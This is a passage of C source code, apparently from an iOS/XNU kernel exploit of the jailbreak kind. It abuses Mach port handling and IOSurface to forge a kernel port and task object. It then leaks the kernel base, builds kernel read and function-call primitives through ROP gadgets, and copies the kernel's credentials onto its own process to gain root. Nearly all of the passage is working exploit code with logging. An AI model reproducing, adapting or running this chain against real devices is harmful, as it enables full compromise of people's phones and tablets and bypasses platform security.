ret = _kernelrpc_mach_port_insert_right_trap(self, port, port, MACH_MSG_TYPE_MAKE_SEND);
875
LOG("mach_port_insert_right: %s", mach_error_string(ret));
876
if(ret != KERN_SUCCESS)
877
{
878
goto out;
879
}
880
881
#pragma pack(4)
882
typedef struct {
883
mach_msg_base_t base;
884
mach_msg_ool_ports_descriptor_t desc[2];
885
} StuffMsg;
886
#pragma pack()
887
StuffMsg msg;
888
msg.base.header.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE);
889
msg.base.header.msgh_remote_port = stuffport;
890
msg.base.header.msgh_local_port = MACH_PORT_NULL;
891
msg.base.header.msgh_id = 1234;
892
msg.base.header.msgh_reserved = 0;
893
msg.base.body.msgh_descriptor_count = 2;
894
msg.desc[0].address = before;
895
msg.desc[0].count = NUM_BEFORE;
896
msg.desc[0].disposition = MACH_MSG_TYPE_MOVE_RECEIVE;
897
msg.desc[0].deallocate = FALSE;
898
msg.desc[0].type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
899
msg.desc[1].address = after;
900
msg.desc[1].count = NUM_AFTER;
901
msg.desc[1].disposition = MACH_MSG_TYPE_MOVE_RECEIVE;
902
msg.desc[1].deallocate = FALSE;
903
msg.desc[1].type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
904
ret = mach_msg(&msg.base.header, MACH_SEND_MSG, (mach_msg_size_t)sizeof(msg), 0, 0, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
905
LOG("mach_msg: %s", mach_error_string(ret));
906
if(ret != KERN_SUCCESS)
907
{
908
goto out;
909
}
910
911
for(size_t i = 0; i < NUM_BEFORE; ++i)
912
{
913
RELEASE_PORT(before[i]);
914
}
915
for(size_t i = 0; i < NUM_AFTER; ++i)
916
{
917
RELEASE_PORT(after[i]);
918
}
919
920
#if 0
921
uint32_t dict[DATA_SIZE / sizeof(uint32_t) + 7] =
922
{
923
// Some header or something
924
surface.data.id,
925
0x0,
926
927
kOSSerializeMagic,
928
kOSSerializeEndCollection | kOSSerializeArray | 2,
929
930
kOSSerializeString | (DATA_SIZE - 1),
931
};
932
dict[DATA_SIZE / sizeof(uint32_t) + 5] = kOSSerializeEndCollection | kOSSerializeString | 4;
933
934
// ipc.ports zone uses 0x3000 allocation chunks, but hardware page size before A9
935
// is actually 0x1000, so references to our reallocated memory may be shifted
936
// by (0x1000 % sizeof(kport_t))
937
kport_t triple_kport =
938
{
939
.ip_lock =
940
{
941
.data = 0x0,
942
.type = 0x11,
943
},
944
#ifdef __LP64__
945
.ip_messages =
946
{
947
.port =
948
{
949
.waitq =
950
{
951
.waitq_queue =
952
{
953
.next = 0x0,
954
.prev = 0x11,
955
}
956
},
957
},
958
},
959
.ip_nsrequest = 0x0,
960
.ip_pdrequest = 0x11,
961
#endif
962
};
963
for(uintptr_t ptr = (uintptr_t)&dict[5], end = (uintptr_t)&dict[5] + DATA_SIZE; ptr + sizeof(kport_t) <= end; ptr += sizeof(kport_t))
964
{
965
UNALIGNED_COPY(&triple_kport, ptr, sizeof(kport_t));
966
}
967
#endif
968
969
// There seems to be some weird asynchronity with freeing on IOConnectCallAsyncStructMethod,
970
// which sucks. To work around it, I register the port to be freed on my own task (thus increasing refs),
971
// sleep after the connect call and register again, thus releasing the reference synchronously.
972
ret = mach_ports_register(self, &port, 1);
973
LOG("mach_ports_register: %s", mach_error_string(ret));
974
if(ret != KERN_SUCCESS)
975
{
976
goto out;
977
}
978
979
uint64_t ref = 0;
980
uint64_t in[3] = { 0, 0x666, 0 };
981
IOConnectCallAsyncStructMethod(client, 17, realport, &ref, 1, in, sizeof(in), NULL, NULL);
982
IOConnectCallAsyncStructMethod(client, 17, port, &ref, 1, in, sizeof(in), NULL, NULL);
983
984
LOG("%s", "herp derp");
985
usleep(100000);
986
sched_yield();
987
ret = mach_ports_register(self, &client, 1); // gonna use that later
988
if(ret != KERN_SUCCESS)
989
{
990
LOG("mach_ports_register: %s", mach_error_string(ret));
991
goto out;
992
}
993
994
// Prevent cleanup
995
fakeport = port;
996
port = MACH_PORT_NULL;
997
998
// Release port with ool port refs
999
RELEASE_PORT(stuffport);
1000
1001
ret = my_mach_zone_force_gc(host);
1002
if(ret != KERN_SUCCESS)
1003
{
1004
LOG("mach_zone_force_gc: %s", mach_error_string(ret));
1005
goto out;
1006
}
1007
1008
#if 0
1009
for(uint32_t i = 0; i < NUM_DATA; ++i)
1010
{
1011
dict[DATA_SIZE / sizeof(uint32_t) + 6] = transpose(i);
1012
kport_t *dptr = (kport_t*)&dict[5];
1013
for(size_t j = 0; j < DATA_SIZE / sizeof(kport_t); ++j)
1014
{
1015
*(((volatile uint32_t*)&dptr[j].ip_context) + 1) = 0x10000000 | (j << 20) | i;
1016
#ifdef __LP64__
1017
*(volatile uint32_t*)&dptr[j].ip_messages.port.pad = 0x20000000 | (j << 20) | i;
1018
*(volatile uint32_t*)&dptr[j].ip_lock.pad = 0x30000000 | (j << 20) | i;
1019
#endif
1020
}
1021
uint32_t dummy = 0;
1022
size = sizeof(dummy);
1023
ret = IOConnectCallStructMethod(client, IOSURFACE_SET_VALUE, dict, sizeof(dict), &dummy, &size);
1024
if(ret != KERN_SUCCESS)
1025
{
1026
LOG("setValue(%u): %s", i, mach_error_string(ret));
1027
goto out;
1028
}
1029
}
1030
#endif
1031
dummy = 0;
1032
size = sizeof(dummy);
1033
ret = IOConnectCallStructMethod(client, IOSURFACE_SET_VALUE, dict_big, dictsz_big, &dummy, &size);
1034
if(ret != KERN_SUCCESS)
1035
{
1036
LOG("setValue(big): %s", mach_error_string(ret));
1037
goto out;
1038
}
1039
1040
uint64_t ctx = 0xffffffff;
1041
ret = my_mach_port_get_context(self, fakeport, &ctx);
1042
LOG("mach_port_get_context: 0x%016llx, %s", ctx, mach_error_string(ret));
1043
if(ret != KERN_SUCCESS)
1044
{
1045
goto out;
1046
}
1047
1048
uint32_t shift_mask = ctx >> 60;
1049
if(shift_mask < 1 || shift_mask > 3)
1050
{
1051
LOG("%s", "Invalid shift mask.");
1052
goto out;
1053
}
1054
#if 0
1055
uint32_t shift_off = sizeof(kport_t) - (((shift_mask - 1) * 0x1000) % sizeof(kport_t));
1056
#endif
1057
uint32_t ins = ((shift_mask - 1) * pagesize) % sizeof(kport_t),
1058
idx = (ctx >> 32) & 0xfffff,
1059
iff = (ctx >> 52) & 0xff;
1060
int64_t fp_off = sizeof(kport_t) * iff - ins;
1061
if(fp_off < 0)
1062
{
1063
--idx;
1064
fp_off += pagesize;
1065
}
1066
uint64_t fakeport_off = (uint64_t)fp_off;
1067
LOG("fakeport offset: 0x%llx", fakeport_off);
1068
#if 0
1069
dict[DATA_SIZE / sizeof(uint32_t) + 6] = transpose(idx);
1070
#endif
1071
uint32_t request[] =
1072
{
1073
// Same header
1074
surface.data.id,
1075
0x0,
1076
1077
#if 0
1078
transpose(idx), // Key
1079
#endif
1080
0x0, // Placeholder
1081
0x0, // Null terminator
1082
};
1083
kport_t kport;
1084
VOLATILE_BZERO32(&kport, sizeof(kport));
1085
kport.ip_bits = 0x80000000; // IO_BITS_ACTIVE | IOT_PORT | IKOT_NONE
1086
kport.ip_references = 100;
1087
kport.ip_lock.type = 0x11;
1088
kport.ip_messages.port.receiver_name = 1;
1089
kport.ip_messages.port.msgcount = MACH_PORT_QLIMIT_KERNEL;
1090
kport.ip_messages.port.qlimit = MACH_PORT_QLIMIT_KERNEL;
1091
kport.ip_srights = 99;
1092
1093
#if 0
1094
// Note to self: must be `(uintptr_t)&dict[5] + DATA_SIZE` and not `ptr + DATA_SIZE`.
1095
for(uintptr_t ptr = (uintptr_t)&dict[5] + shift_off, end = (uintptr_t)&dict[5] + DATA_SIZE; ptr + sizeof(kport_t) <= end; ptr += sizeof(kport_t))
1096
{
1097
UNALIGNED_COPY(&kport, ptr, sizeof(kport_t));
1098
}
1099
#endif
1100
1101
ret = reallocate_fakeport(client, surface.data.id, idx, fakeport_off, pagesize, &kport, dict_small, dictsz_small);
1102
LOG("reallocate_fakeport: %s", mach_error_string(ret));
1103
if(ret != KERN_SUCCESS)
1104
{
1105
goto out;
1106
}
1107
1108
// Register realport on fakeport
1109
mach_port_t notify = MACH_PORT_NULL;
1110
ret = mach_port_request_notification(self, fakeport, MACH_NOTIFY_PORT_DESTROYED, 0, realport, MACH_MSG_TYPE_MAKE_SEND_ONCE, &notify);
1111
LOG("mach_port_request_notification(realport): %x, %s", notify, mach_error_string(ret));
1112
if(ret != KERN_SUCCESS)
1113
{
1114
goto out;
1115
}
1116
1117
#if 0
1118
uint32_t response[4 + (DATA_SIZE / sizeof(uint32_t))] = { 0 };
1119
size = sizeof(response);
1120
ret = IOConnectCallStructMethod(client, IOSURFACE_GET_VALUE, request, sizeof(request), response, &size);
1121
LOG("getValue(%u): 0x%lx bytes, %s", idx, size, mach_error_string(ret));
1122
if(ret != KERN_SUCCESS)
1123
{
1124
goto out;
1125
}
1126
if(size < DATA_SIZE + 0x10)
1127
{
1128
LOG("Response too short.");
1129
goto out;
1130
}
1131
#endif
1132
kport_t myport;
1133
VOLATILE_BZERO32(&myport, sizeof(myport));
1134
ret = readback_fakeport(client, idx, fakeport_off, pagesize, request, sizeof(request), resp, respsz, &myport);
1135
if(ret != KERN_SUCCESS)
1136
{
1137
goto out;
1138
}
1139
1140
#if 0
1141
uint32_t fakeport_off = -1;
1142
kptr_t realport_addr = 0;
1143
for(uintptr_t ptr = (uintptr_t)&response[4] + shift_off, end = (uintptr_t)&response[4] + DATA_SIZE; ptr + sizeof(kport_t) <= end; ptr += sizeof(kport_t))
1144
{
1145
kptr_t val = UNALIGNED_KPTR_DEREF(&((kport_t*)ptr)->ip_pdrequest);
1146
if(val)
1147
{
1148
fakeport_off = ptr - (uintptr_t)&response[4];
1149
realport_addr = val;
1150
break;
1151
}
1152
}
1153
#endif
1154
kptr_t realport_addr = myport.ip_pdrequest;
1155
if(!realport_addr)
1156
{
1157
LOG("%s", "Failed to leak realport address");
1158
goto out;
1159
}
1160
//LOG("realport addr: " ADDR, realport_addr);
1161
#if 0
1162
uintptr_t fakeport_dictbuf = (uintptr_t)&dict[5] + fakeport_off;
1163
#endif
1164
1165
// Register fakeport on itself (and clean ref on realport)
1166
notify = MACH_PORT_NULL;
1167
ret = mach_port_request_notification(self, fakeport, MACH_NOTIFY_PORT_DESTROYED, 0, fakeport, MACH_MSG_TYPE_MAKE_SEND_ONCE, &notify);
1168
LOG("mach_port_request_notification(fakeport): %x, %s", notify, mach_error_string(ret));
1169
if(ret != KERN_SUCCESS)
1170
{
1171
goto out;
1172
}
1173
1174
#if 0
1175
size = sizeof(response);
1176
ret = IOConnectCallStructMethod(client, IOSURFACE_GET_VALUE, request, sizeof(request), response, &size);
1177
LOG("getValue(%u): 0x%lx bytes, %s", idx, size, mach_error_string(ret));
1178
if(ret != KERN_SUCCESS)
1179
{
1180
goto out;
1181
}
1182
if(size < DATA_SIZE + 0x10)
1183
{
1184
LOG("Response too short.");
1185
goto out;
1186
}
1187
kptr_t fakeport_addr = UNALIGNED_KPTR_DEREF(&((kport_t*)((uintptr_t)&response[4] + fakeport_off))->ip_pdrequest);
1188
#endif
1189
ret = readback_fakeport(client, idx, fakeport_off, pagesize, request, sizeof(request), resp, respsz, &myport);
1190
if(ret != KERN_SUCCESS)
1191
{
1192
goto out;
1193
}
1194
kptr_t fakeport_addr = myport.ip_pdrequest;
1195
if(!fakeport_addr)
1196
{
1197
LOG("%s", "Failed to leak fakeport address");
1198
goto out;
1199
}
1200
LOG("fakeport addr: " ADDR, fakeport_addr);
1201
kptr_t fake_addr = fakeport_addr - fakeport_off;
1202
1203
kport_request_t kreq =
1204
{
1205
.notify =
1206
{
1207
.port = 0,
1208
}
1209
};
1210
kport.ip_requests = fakeport_addr + ((uintptr_t)&kport.ip_context - (uintptr_t)&kport) - ((uintptr_t)&kreq.name.size - (uintptr_t)&kreq);
1211
#if 0
1212
UNALIGNED_COPY(&kport, fakeport_dictbuf, sizeof(kport));
1213
1214
ret = reallocate_buf(client, surface.data.id, idx, dict, sizeof(dict));
1215
LOG("reallocate_buf: %s", mach_error_string(ret));
1216
if(ret != KERN_SUCCESS)
1217
{
1218
goto out;
1219
}
1220
#endif
1221
ret = reallocate_fakeport(client, surface.data.id, idx, fakeport_off, pagesize, &kport, dict_small, dictsz_small);
1222
LOG("reallocate_fakeport: %s", mach_error_string(ret));
1223
if(ret != KERN_SUCCESS)
1224
{
1225
goto out;
1226
}
1227
1228
#define KREAD(addr, buf, len) \
1229
do \
1230
{ \
1231
for(size_t i = 0; i < ((len) + sizeof(uint32_t) - 1) / sizeof(uint32_t); ++i) \
1232
{ \
1233
ret = my_mach_port_set_context(self, fakeport, (addr) + i * sizeof(uint32_t)); \
1234
if(ret != KERN_SUCCESS) \
1235
{ \
1236
LOG("mach_port_set_context: %s", mach_error_string(ret)); \
1237
goto out; \
1238
} \
1239
mach_msg_type_number_t outsz = 1; \
1240
ret = mach_port_get_attributes(self, fakeport, MACH_PORT_DNREQUESTS_SIZE, (mach_port_info_t)((uint32_t*)(buf) + i), &outsz); \
1241
if(ret != KERN_SUCCESS) \
1242
{ \
1243
LOG("mach_port_get_attributes: %s", mach_error_string(ret)); \
1244
goto out; \
1245
} \
1246
} \
1247
} while(0)
1248
1249
kptr_t itk_space = 0;
1250
KREAD(realport_addr + ((uintptr_t)&kport.ip_receiver - (uintptr_t)&kport), &itk_space, sizeof(itk_space));
1251
LOG("itk_space: " ADDR, itk_space);
1252
if(!itk_space)
1253
{
1254
goto out;
1255
}
1256
1257
kptr_t self_task = 0;
1258
KREAD(itk_space + off->ipc_space_is_task, &self_task, sizeof(self_task));
1259
LOG("self_task: " ADDR, self_task);
1260
if(!self_task)
1261
{
1262
goto out;
1263
}
1264
1265
kptr_t IOSurfaceRootUserClient_port = 0;
1266
KREAD(self_task + off->task_itk_registered, &IOSurfaceRootUserClient_port, sizeof(IOSurfaceRootUserClient_port));
1267
LOG("IOSurfaceRootUserClient port: " ADDR, IOSurfaceRootUserClient_port);
1268
if(!IOSurfaceRootUserClient_port)
1269
{
1270
goto out;
1271
}
1272
1273
kptr_t IOSurfaceRootUserClient_addr = 0;
1274
KREAD(IOSurfaceRootUserClient_port + ((uintptr_t)&kport.ip_kobject - (uintptr_t)&kport), &IOSurfaceRootUserClient_addr, sizeof(IOSurfaceRootUserClient_addr));
1275
LOG("IOSurfaceRootUserClient addr: " ADDR, IOSurfaceRootUserClient_addr);
1276
if(!IOSurfaceRootUserClient_addr)
1277
{
1278
goto out;
1279
}
1280
1281
kptr_t IOSurfaceRootUserClient_vtab = 0;
1282
KREAD(IOSurfaceRootUserClient_addr, &IOSurfaceRootUserClient_vtab, sizeof(IOSurfaceRootUserClient_vtab));
1283
LOG("IOSurfaceRootUserClient vtab: " ADDR, IOSurfaceRootUserClient_vtab);
1284
if(!IOSurfaceRootUserClient_vtab)
1285
{
1286
goto out;
1287
}
1288
1289
// Unregister IOSurfaceRootUserClient port
1290
ret = mach_ports_register(self, NULL, 0);
1291
LOG("mach_ports_register: %s", mach_error_string(ret));
1292
if(ret != KERN_SUCCESS)
1293
{
1294
goto out;
1295
}
1296
1297
kptr_t vtab[VTAB_SIZE] = { 0 };
1298
KREAD(IOSurfaceRootUserClient_vtab, vtab, sizeof(vtab));
1299
1300
kptr_t kbase = (vtab[off->vtab_get_retain_count] & ~(KERNEL_SLIDE_STEP - 1)) + KERNEL_HEADER_OFFSET;
1301
for(uint32_t magic = 0; 1; kbase -= KERNEL_SLIDE_STEP)
1302
{
1303
KREAD(kbase, &magic, sizeof(magic));
1304
if(magic == KERNEL_MAGIC)
1305
{
1306
break;
1307
}
1308
}
1309
LOG("Kernel base: " ADDR, kbase);
1310
1311
#define OFF(name) (off->name + (kbase - off->base))
1312
1313
kptr_t zone_map_addr = 0;
1314
KREAD(OFF(zone_map), &zone_map_addr, sizeof(zone_map_addr));
1315
LOG("zone_map: " ADDR, zone_map_addr);
1316
if(!zone_map_addr)
1317
{
1318
goto out;
1319
}
1320
1321
#ifdef __LP64__
1322
vtab[off->vtab_get_external_trap_for_index] = OFF(rop_ldr_x0_x0_0x10);
1323
#else
1324
vtab[off->vtab_get_external_trap_for_index] = OFF(rop_ldr_r0_r0_0xc);
1325
#endif
1326
1327
uint32_t faketask_off = fakeport_off < sizeof(ktask_t) ? UINT64_ALIGN_UP(fakeport_off + sizeof(kport_t)) : UINT64_ALIGN_DOWN(fakeport_off - sizeof(ktask_t));
1328
void* faketask_buf = (void*)((uintptr_t)&dict_small[9] + faketask_off);
1329
1330
ktask_t ktask;
1331
VOLATILE_BZERO32(&ktask, sizeof(ktask));
1332
ktask.a.lock.data = 0x0;
1333
ktask.a.lock.type = 0x22;
1334
ktask.a.ref_count = 100;
1335
ktask.a.active = 1;
1336
ktask.a.map = zone_map_addr;
1337
ktask.b.itk_self = 1;
1338
#if 0
1339
UNALIGNED_COPY(&ktask, faketask_buf, sizeof(ktask));
1340
#endif
1341
VOLATILE_BCOPY32(&ktask, faketask_buf, sizeof(ktask));
1342
1343
kport.ip_bits = 0x80000002; // IO_BITS_ACTIVE | IOT_PORT | IKOT_TASK
1344
kport.ip_kobject = fake_addr + faketask_off;
1345
kport.ip_requests = 0;
1346
kport.ip_context = 0;
1347
#if 0
1348
UNALIGNED_COPY(&kport, fakeport_dictbuf, sizeof(kport));
1349
#endif
1350
if(fakeport_off + sizeof(kport_t) > pagesize)
1351
{
1352
size_t sz = pagesize - fakeport_off;
1353
VOLATILE_BCOPY32(&kport, (void*)((uintptr_t)&dict_small[9] + fakeport_off), sz);
1354
VOLATILE_BCOPY32((void*)((uintptr_t)&kport + sz), &dict_small[9], sizeof(kport) - sz);
1355
}
1356
else
1357
{
1358
VOLATILE_BCOPY32(&kport, (void*)((uintptr_t)&dict_small[9] + fakeport_off), sizeof(kport));
1359
}
1360
1361
#undef KREAD
1362
#if 0
1363
ret = reallocate_buf(client, surface.data.id, idx, dict, sizeof(dict));
1364
LOG("reallocate_buf: %s", mach_error_string(ret));
1365
if(ret != KERN_SUCCESS)
1366
{
1367
goto out;
1368
}
1369
#endif
1370
shmemsz = pagesize;
1371
dict_small[6] = transpose(idx);
1372
ret = reallocate_buf(client, surface.data.id, idx, dict_small, dictsz_small);
1373
LOG("reallocate_buf: %s", mach_error_string(ret));
1374
if(ret != KERN_SUCCESS)
1375
{
1376
goto out;
1377
}
1378
if(fakeport_off + sizeof(kport_t) > pagesize)
1379
{
1380
shmemsz *= 2;
1381
dict_small[6] = transpose(idx + 1);
1382
ret = reallocate_buf(client, surface.data.id, idx + 1, dict_small, dictsz_small);
1383
LOG("reallocate_buf: %s", mach_error_string(ret));
1384
if(ret != KERN_SUCCESS)
1385
{
1386
goto out;
1387
}
1388
}
1389
1390
vm_prot_t cur = 0,
1391
max = 0;
1392
sched_yield();
1393
ret = mach_vm_remap(self, &shmem_addr, shmemsz, 0, VM_FLAGS_ANYWHERE | VM_FLAGS_RETURN_DATA_ADDR, fakeport, fake_addr, false, &cur, &max, VM_INHERIT_NONE);
1394
if(ret != KERN_SUCCESS)
1395
{
1396
LOG("mach_vm_remap: %s", mach_error_string(ret));
1397
goto out;
1398
}
1399
*(uint32_t*)shmem_addr = 123; // fault page
1400
LOG("shmem_addr: 0x%016llx", shmem_addr);
1401
volatile kport_t *fakeport_buf = (volatile kport_t*)(shmem_addr + fakeport_off);
1402
1403
uint32_t vtab_off = fakeport_off < sizeof(vtab) ? fakeport_off + sizeof(kport_t) : 0;
1404
vtab_off = UINT64_ALIGN_UP(vtab_off);
1405
kptr_t vtab_addr = fake_addr + vtab_off;
1406
LOG("vtab addr: " ADDR, vtab_addr);
1407
volatile kptr_t *vtab_buf = (volatile kptr_t*)(shmem_addr + vtab_off);
1408
for(volatile kptr_t *src = vtab, *dst = vtab_buf, *end = src + VTAB_SIZE; src < end; *(dst++) = *(src++));
1409
1410
#define MAXRANGES 5
1411
struct
1412
{
1413
uint32_t start;
1414
uint32_t end;
1415
} ranges[MAXRANGES] =
1416
{
1417
{ fakeport_off, (uint32_t)(fakeport_off + sizeof(kport_t)) },
1418
{ vtab_off, (uint32_t)(vtab_off + sizeof(vtab)) },
1419
};
1420
size_t numranges = 2;
1421
#define FIND_RANGE(var, size) \
1422
do \
1423
{ \
1424
if(numranges >= MAXRANGES) \
1425
{ \
1426
/*LOG("FIND_RANGE(" #var "): ranges array too small");*/ \
1427
goto out; \
1428
} \
1429
for(uint32_t i = 0; i < numranges;) \
1430
{ \
1431
uint32_t end = var + (uint32_t)(size); \
1432
if( \
1433
(var >= ranges[i].start && var < ranges[i].end) || \
1434
(end >= ranges[i].start && var < ranges[i].end) \
1435
) \
1436
{ \
1437
var = UINT64_ALIGN_UP(ranges[i].end); \
1438
i = 0; \
1439
continue; \
1440
} \
1441
++i; \
1442
} \
1443
if(var + (uint32_t)(size) > pagesize) \
1444
{ \
1445
/* LOG("FIND_RANGE(" #var ") out of range: 0x%x-0x%x", var, var + (uint32_t)(size));*/ \
1446
goto out; \
1447
} \
1448
ranges[numranges].start = var; \
1449
ranges[numranges].end = var + (uint32_t)(size); \
1450
++numranges; \
1451
} while(0)
1452
1453
typedef volatile union
1454
{
1455
struct {
1456
// IOUserClient fields
1457
kptr_t vtab;
1458
uint32_t refs;
1459
uint32_t pad;
1460
// Gadget stuff
1461
kptr_t trap_ptr;
1462
// IOExternalTrap fields
1463
kptr_t obj;
1464
kptr_t func;
1465
uint32_t break_stuff; // idk wtf this field does, but it has to be zero or iokit_user_client_trap does some weird pointer mashing
1466
// OSSerializer::serialize
1467
kptr_t indirect[3];
1468
} a;
1469
struct {
1470
char pad[OFFSET_IOUSERCLIENT_IPC];
1471
int32_t __ipc;
1472
} b;
1473
} kobj_t;
1474
1475
uint32_t fakeobj_off = 0;
1476
FIND_RANGE(fakeobj_off, sizeof(kobj_t));
1477
kptr_t fakeobj_addr = fake_addr + fakeobj_off;
1478
LOG("fakeobj addr: " ADDR, fakeobj_addr);
1479
volatile kobj_t *fakeobj_buf = (volatile kobj_t*)(shmem_addr + fakeobj_off);
1480
VOLATILE_BZERO32(fakeobj_buf, sizeof(kobj_t));
1481
1482
fakeobj_buf->a.vtab = vtab_addr;
1483
fakeobj_buf->a.refs = 100;
1484
fakeobj_buf->a.trap_ptr = fakeobj_addr + ((uintptr_t)&fakeobj_buf->a.obj - (uintptr_t)fakeobj_buf);
1485
fakeobj_buf->a.break_stuff = 0;
1486
fakeobj_buf->b.__ipc = 100;
1487
1488
fakeport_buf->ip_bits = 0x8000001d; // IO_BITS_ACTIVE | IOT_PORT | IKOT_IOKIT_CONNECT
1489
fakeport_buf->ip_kobject = fakeobj_addr;
1490
1491
// First arg to KCALL can't be == 0, so we need KCALL_ZERO which indirects through OSSerializer::serialize.
1492
// That way it can take way less arguments, but well, it can pass zero as first arg.
1493
#define KCALL(addr, x0, x1, x2, x3, x4, x5, x6) \
1494
( \
1495
fakeobj_buf->a.obj = (kptr_t)(x0), \
1496
fakeobj_buf->a.func = (kptr_t)(addr), \
1497
(kptr_t)IOConnectTrap6(fakeport, 0, (kptr_t)(x1), (kptr_t)(x2), (kptr_t)(x3), (kptr_t)(x4), (kptr_t)(x5), (kptr_t)(x6)) \
1498
)
1499
#define KCALL_ZERO(addr, x0, x1, x2) \
1500
( \
1501
fakeobj_buf->a.obj = fakeobj_addr + ((uintptr_t)&fakeobj_buf->a.indirect - (uintptr_t)fakeobj_buf) - 2 * sizeof(kptr_t), \
1502
fakeobj_buf->a.func = OFF(osserializer_serialize), \
1503
fakeobj_buf->a.indirect[0] = (x0), \
1504
fakeobj_buf->a.indirect[1] = (x1), \
1505
fakeobj_buf->a.indirect[2] = (addr), \
1506
(kptr_t)IOConnectTrap6(fakeport, 0, (kptr_t)(x2), 0, 0, 0, 0, 0) \
1507
)
1508
kptr_t kernel_task_addr = 0;
1509
int r = KCALL(OFF(copyout), OFF(kernel_task), &kernel_task_addr, sizeof(kernel_task_addr), 0, 0, 0, 0);
1510
LOG("kernel_task addr: " ADDR ", %s, %s", kernel_task_addr, errstr(r), mach_error_string(r));
1511
if(r != 0 || !kernel_task_addr)
1512
{
1513
goto out;
1514
}
1515
1516
kptr_t kernproc_addr = 0;
1517
r = KCALL(OFF(copyout), kernel_task_addr + off->task_bsd_info, &kernproc_addr, sizeof(kernproc_addr), 0, 0, 0, 0);
1518
LOG("kernproc addr: " ADDR ", %s, %s", kernproc_addr, errstr(r), mach_error_string(r));
1519
if(r != 0 || !kernproc_addr)
1520
{
1521
goto out;
1522
}
1523
1524
kptr_t kern_ucred = 0;
1525
r = KCALL(OFF(copyout), kernproc_addr + off->proc_ucred, &kern_ucred, sizeof(kern_ucred), 0, 0, 0, 0);
1526
LOG("kern_ucred: " ADDR ", %s, %s", kern_ucred, errstr(r), mach_error_string(r));
1527
if(r != 0 || !kern_ucred)
1528
{
1529
goto out;
1530
}
1531
1532
kptr_t self_proc = 0;
1533
r = KCALL(OFF(copyout), self_task + off->task_bsd_info, &self_proc, sizeof(self_proc), 0, 0, 0, 0);
1534
LOG("self_proc: " ADDR ", %s, %s", self_proc, errstr(r), mach_error_string(r));
1535
if(r != 0 || !self_proc)
1536
{
1537
goto out;
1538
}
1539
1540
kptr_t self_ucred = 0;
1541
r = KCALL(OFF(copyout), self_proc + off->proc_ucred, &self_ucred, sizeof(self_ucred), 0, 0, 0, 0);
1542
LOG("self_ucred: " ADDR ", %s, %s", self_ucred, errstr(r), mach_error_string(r));
1543
if(r != 0 || !self_ucred)
1544
{
1545
goto out;
1546
}
1547
1548
int olduid = getuid();
1549
LOG("uid: %u", olduid);
1550
1551
KCALL(OFF(kauth_cred_ref), kern_ucred, 0, 0, 0, 0, 0, 0);
1552
r = KCALL(OFF(copyin), &kern_ucred, self_proc + off->proc_ucred, sizeof(kern_ucred), 0, 0, 0, 0);
1553
LOG("copyin: %s", errstr(r));
1554
if(r != 0 || !self_ucred)
1555
{
1556
goto out;
1557
}
1558
// Note: decreasing the refcount on the old cred causes a panic with "cred reference underflow", so... don't do that.
1559
LOG("%s", "stole the kernel's credentials");
1560
setuid(0); // update host port
1561
1562
int newuid = getuid();
1563
LOG("uid: %u", newuid);
1564
1565
if(newuid != olduid)
1566
{
1567
KCALL_ZERO(OFF(chgproccnt), newuid, 1, 0);
1568
KCALL_ZERO(OFF(chgproccnt), olduid, -1, 0);
1569
}
1570
1571
host_t realhost = mach_host_self();
1572
LOG("realhost: %x (host: %x)", realhost, host);
1573
1574
uint32_t zm_task_off = 0;
1575
FIND_RANGE(zm_task_off, sizeof(ktask_t));
1576
kptr_t zm_task_addr = fake_addr + zm_task_off;
1577
LOG("zm_task addr: " ADDR, zm_task_addr);
1578
volatile ktask_t *zm_task_buf = (volatile ktask_t*)(shmem_addr + zm_task_off);
1579
VOLATILE_BZERO32(zm_task_buf, sizeof(ktask_t));
1580
1581
zm_task_buf->a.lock.data = 0x0;
1582
zm_task_buf->a.lock.type = 0x22;
1583
zm_task_buf->a.ref_count = 100;
1584
zm_task_buf->a.active = 1;
1585
zm_task_buf->b.itk_self = 1;
1586
zm_task_buf->a.map = zone_map_addr;
1587
1588
uint32_t km_task_off = 0;
1589
FIND_RANGE(km_task_off, sizeof(ktask_t));
1590
kptr_t km_task_addr = fake_addr + km_task_off;
1591
LOG("km_task addr: " ADDR, km_task_addr);
1592
volatile ktask_t *km_task_buf = (volatile ktask_t*)(shmem_addr + km_task_off);
1593
VOLATILE_BZERO32(km_task_buf, sizeof(ktask_t));
1594
1595
km_task_buf->a.lock.data = 0x0;
1596
km_task_buf->a.lock.type = 0x22;
1597
km_task_buf->a.ref_count = 100;
1598
km_task_buf->a.active = 1;
1599
km_task_buf->b.itk_self = 1;
1600
r = KCALL(OFF(copyout), OFF(kernel_map), &km_task_buf->a.map, sizeof(km_task_buf->a.map), 0, 0, 0, 0);
1601
LOG("kernel_map: " ADDR ", %s", km_task_buf->a.map, errstr(r));
1602
if(r != 0 || !km_task_buf->a.map)
1603
{
1604
goto out;
1605
}
1606
1607
kptr_t ipc_space_kernel = 0;
1608
r = KCALL(OFF(copyout), IOSurfaceRootUserClient_port + ((uintptr_t)&kport.ip_receiver - (uintptr_t)&kport), &ipc_space_kernel, sizeof(ipc_space_kernel), 0, 0, 0, 0);
1609
LOG("ipc_space_kernel: " ADDR ", %s", ipc_space_kernel, errstr(r));
1610
if(r != 0 || !ipc_space_kernel)
1611
{
1612
goto out;
1613
}
1614
1615
#ifdef __LP64__
1616
kmap_hdr_t zm_hdr = { 0 };
1617
r = KCALL(OFF(copyout), zm_task_buf->a.map + off->vm_map_hdr, &zm_hdr, sizeof(zm_hdr), 0, 0, 0, 0);
1618
LOG("zm_range: " ADDR "-" ADDR ", %s", zm_hdr.start, zm_hdr.end, errstr(r));
1619
if(r != 0 || !zm_hdr.start || !zm_hdr.end)
1620
{
1621
goto out;
1622
}
1623
if(zm_hdr.end - zm_hdr.start > 0x100000000)
1624
{
1625
LOG("%s", "zone_map is too big, sorry.");
1626
goto out;
1627
}
1628
kptr_t zm_tmp = 0; // macro scratch space
1629
# define ZM_FIX_ADDR(addr) \
1630
( \
1631
zm_tmp = (zm_hdr.start & 0xffffffff00000000) | ((addr) & 0xffffffff), \
1632
zm_tmp < zm_hdr.start ? zm_tmp + 0x100000000 : zm_tmp \
1633
)
1634
#else
1635
# define ZM_FIX_ADDR(addr) (addr)
1636
#endif
1637
1638
kptr_t ptrs[2] = { 0 };
1639
